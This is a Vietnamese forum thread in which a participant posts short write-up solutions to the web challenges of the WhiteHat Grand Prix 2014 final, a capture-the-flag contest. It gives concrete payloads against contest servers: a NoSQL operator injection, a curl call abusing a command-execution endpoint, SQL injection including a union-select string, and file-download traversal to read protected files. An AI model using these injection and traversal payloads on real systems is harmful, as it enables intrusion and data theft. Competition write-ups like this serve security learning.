Topic này được tạo để các bạn viết, trao đổi thảo luận về Writeup Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014. Đề thi: Mời bạn đăng nhập vào trang http://grandprix.whitehat.vn/ bằng tài khoản và mật khẩu WhiteHat Forum để lấy đề thi.
Re: [Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014 Web100: Mã: http://103.237.98.38/web100/index.php?name[$ne]=abc Web300: Mã: curl -ik http://103.237.98.38/web300/execute.php -d "command=sha1sum&filename=login.php" Down login.php -> decode -> flag Web400: Mã: http://103.237.98.38/web400/ SQLi trong phần reg/login, mình ko nhớ rõ nhưng đại loại leak ở sessionid khi login. Vào được admin -> http://103.237.98.38/web400/broken/data/download.php . đoán đc field ?file=download.php view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/.htaccess view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/_secret__ Web trong phần Att/Def: Mã: Lỗi nằm ở phần download file sau khi upload, đại loại là: -1' union select 1,'./flag/...' -- a